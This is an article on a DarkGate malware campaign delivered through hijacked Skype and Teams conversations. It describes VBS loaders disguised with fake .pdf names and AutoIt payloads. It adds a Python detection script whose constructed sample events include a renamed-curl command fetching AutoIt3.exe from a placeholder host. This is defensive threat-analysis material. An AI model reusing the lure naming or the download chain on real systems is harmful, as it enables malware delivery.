Security researchers at TrendMicro have observed a DarkGate campaign distributing malware from compromised Skype accounts between July and September 2023.
The malware, detected as TrojanSpy.AutoIt.DARKGATE.AA, abuses instant messaging platforms to deliver VBS loader scripts to its victims.
Once the script has been downloaded and run, it starts the second stage: an AutoIt script that contains the DarkGate malware code.
How the Skype accounts used for distribution were compromised is unknown at this point. One possibility is that the credentials came from leaks sold on the dark web or underground forums; another is that a parent organization had previously been compromised.
After a couple of years of relative quiet, DarkGate has become one of the most prominent malware families in the malicious campaigns recorded this year.
Researchers at TrendMicro disclosed that:
“Upon closely monitoring this campaign, we observed that most of DarkGate attacks were detected in the Americas region, followed closely by those in Asia, the Middle East, and Africa.”
HISTORY OF THE DARKGATE MALWARE:
DarkGate was first documented in 2017. Classified as a commodity loader, it has been advertised on eCrime (a Russian-language forum) since May 2023, and its use as the initial entry point for threat actors targeting a victim has grown rapidly since then.
DarkGate is not just a loader; it comes with a range of capabilities, including:
- Executing discovery commands (including directory traversal).
- Self-updating and self-management.
- Deploying remote access tooling (RDP, hVNC, and AnyDesk).
- Starting, stopping, and configuring cryptocurrency mining.
- Keylogging.
- Exfiltrating browser data.
- Escalating privileges.
DarkGate also relies on AutoIt, a legitimate Windows scripting tool, which it uses both to deliver and to execute its malicious code.
Although AutoIt is a legitimate tool, it is frequently abused by threat actors for obfuscation and for evading antivirus and other malware detection tools. Its presence made DarkGate easy for the TrendMicro team to tell apart from other loaders, since their research shows that IcedID, Emotet, and Qakbot do not abuse AutoIt.
OVERVIEW OF THE MALWARE CAMPAIGN:
TrendMicro found the campaign simple to carry out: the threat actors abused a trusted relationship between two organizations to trick the recipient into running the attached VBS script. They hijacked existing conversations in the compromised Skype accounts and crafted malicious files that matched the context of the conversation history.
The attachment is a VBS script with a name of the form <filename.pdf>www.skype[.]vbs. The ".pdf" portion is what the victim sees, while the real www.skype[.]vbs ending is pushed out of view; the file is a script, not a document.
When the recipient runs the script, it creates a new folder with a random name ("<Random Char>"), copies the legitimate curl.exe into it under that same random name with an .exe extension (<Random Char>.exe), and then downloads the AutoIt3 interpreter and an .au3 script from the threat actor's command-and-control (C2) server.
Trend Vision (a TrendMicro product) detected the VBS script being loaded through the native Windows wscript.exe. In other cases the threat actor sent malicious links via Microsoft Teams chat; this worked because the organization allowed messages from external users, which exposed it to spam from outside.
Another observed delivery method was a ".LNK" file inside a compressed archive hosted on a SharePoint site.
The malicious .LNK files carried names such as:
- Company_Transformations.pdf.lnk.
- Revamped_organizational_structure.pdf.lnk.
- Position_Guidelines.pdf.lnk.
- Fresh_Mission_and_Core_Values.pdf.lnk.
- Employees_Affected_by_Transition.pdf.lnk.
The malware uses conditional execution: the second command runs only if the preceding command fails (in a cmd.exe command line this is what the || operator does).
The .au3 script also performs its own checks before proceeding:
- that %Program Files% exists;
- that the current username is not "SYSTEM".
If both checks pass, the program looks for a file with the ".au3" extension, decrypts it, and executes the DarkGate payload. If the ".au3" file cannot be loaded, it displays an error message box and terminates.
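As an added example (not code from the TrendMicro report), here is detection logic for the chain just described, run over constructed process-creation events in the shape of Sysmon Event ID 1 fields (Image, ParentImage, OriginalFileName, CommandLine). It flags the three observable steps: a script host running a file with a disguised double extension (both the <filename.pdf>www.skype[.]vbs form and the .pdf.lnk names above), curl.exe running under a random name, and the AutoIt3 interpreter running an .au3 from a user-writable folder. The random folder name, every path, the download URL and all sample events are constructed for this example, and the rule names are chosen here rather than taken from any product.

```python
"""
Added example (not TrendMicro's code): detection logic for the DarkGate delivery
chain, run over constructed process-creation events shaped like Sysmon Event ID 1
fields (Image, ParentImage, OriginalFileName, CommandLine).
All sample events, paths, host names and file names below are made up.
"""
import re
from pathlib import PureWindowsPath

# Extensions a recipient reads as "a document" versus extensions Windows executes.
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}
EXEC_EXTS = {".vbs", ".vbe", ".js", ".jse", ".lnk", ".bat", ".cmd", ".hta", ".exe", ".scr"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\(users|programdata|temp|tmp)\\", re.IGNORECASE)


def is_disguised_name(filename: str) -> bool:
    """True when a document extension appears before the real executable extension.

    Catches both 'Report.pdf.lnk' and 'Invoice.pdf www.skype.vbs': in the second
    form '.pdf' is followed by a space and a decoy name so the real '.vbs' ending
    is pushed out of view.
    """
    name = PureWindowsPath(filename).name.lower()
    m = re.search(r"\.([a-z0-9]+)$", name)
    if not m or "." + m.group(1) not in EXEC_EXTS:
        return False
    body = name[: m.start()]  # everything before the real extension
    return any(re.search(re.escape(ext) + r"(?=$|[\s.])", body) for ext in DOC_EXTS)


def scan_filenames(names):
    """Return the names (e.g. from attachment or file-create logs) that are disguised."""
    return [n for n in names if is_disguised_name(n)]


def script_argument(cmdline: str) -> str:
    """Extract the file argument from a command line, honouring quotes, skipping switches.

    Unquoted tokens are re-joined so an unquoted 'a.pdf www.skype.vbs' stays whole.
    """
    tokens = [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmdline)]
    return " ".join(t for t in tokens[1:] if not t.startswith(("/", "-")))


def detect(event: dict) -> list:
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    original = event.get("OriginalFileName", "").lower()
    arg = script_argument(event.get("CommandLine", ""))

    # Rule 1: a script host running a file whose name hides the real extension.
    if image in SCRIPT_HOSTS and is_disguised_name(arg):
        hits.append("disguised_script_via_wscript")

    # Rule 2: curl.exe running under another name. OriginalFileName comes from the
    # PE version resource, so curl.exe copied to <random>.exe still reports curl.exe.
    # Some legitimate software bundles a renamed curl, so this is a strong signal,
    # not proof on its own.
    if original == "curl.exe" and image != "curl.exe":
        hits.append("renamed_curl")

    # Rule 3: the AutoIt3 interpreter launched by a script host, or running an
    # .au3 from a user-writable directory rather than an install location.
    if "autoit3.exe" in (original, image):
        if parent in SCRIPT_HOSTS or (arg.lower().endswith(".au3") and USER_WRITABLE.search(arg)):
            hits.append("autoit3_running_au3")
    return hits


TEMP = r"C:\Users\alice\AppData\Local\Temp\hGqkz"  # constructed random-name folder
SAMPLE_EVENTS = [  # constructed, in the order the chain would produce them
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "OriginalFileName": "wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Invoice.pdf www.skype.vbs"'},
    {"Image": TEMP + r"\hGqkz.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "OriginalFileName": "curl.exe",
     "CommandLine": TEMP + r"\hGqkz.exe -o " + TEMP + r"\AutoIt3.exe http://203.0.113.10/AutoIt3.exe"},
    {"Image": TEMP + r"\AutoIt3.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "OriginalFileName": "AutoIt3.exe",
     "CommandLine": '"' + TEMP + r'\AutoIt3.exe" "' + TEMP + r'\xVbQm.au3"'},
    # Benign: a domain logon script, and an AutoIt example run from its install directory.
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "OriginalFileName": "wscript.exe",
     "CommandLine": r"wscript.exe //B \\corp.example\netlogon\logon.vbs"},
    {"Image": r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "OriginalFileName": "AutoIt3.exe",
     "CommandLine": r'"C:\Program Files (x86)\AutoIt3\AutoIt3.exe" "C:\Program Files (x86)\AutoIt3\Examples\Hello.au3"'},
]


def run(events=SAMPLE_EVENTS):
    """Evaluate every event; return [(image basename, rule names)] for those that fired."""
    flagged = []
    for ev in events:
        hits = detect(ev)
        if hits:
            flagged.append((PureWindowsPath(ev["Image"]).name, hits))
    return flagged


if __name__ == "__main__":
    for name, rules in run():
        print(f"{name}: {', '.join(rules)}")
    print("disguised names:", scan_filenames(
        ["Company_Transformations.pdf.lnk", "Quarterly_Report.pdf", "www.skype.vbs"]))
```

The two benign events show why each rule is scoped: a logon script run by wscript.exe from NETLOGON carries no decoy extension, and an .au3 run from the AutoIt install directory by explorer.exe matches neither the script-host parent nor a user-writable path. In a real deployment the file-name check would also be applied to mail attachment and file-creation logs, which is where the .pdf.lnk names above would surface before anything executes.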
TrendMicro stated that the attack was quickly detected and contained before the threat actors could reach their objectives. They are also of the opinion that those objectives may vary depending on the affiliate running the campaign. The full research and findings, together with a list of IoCs, are available in TrendMicro's report.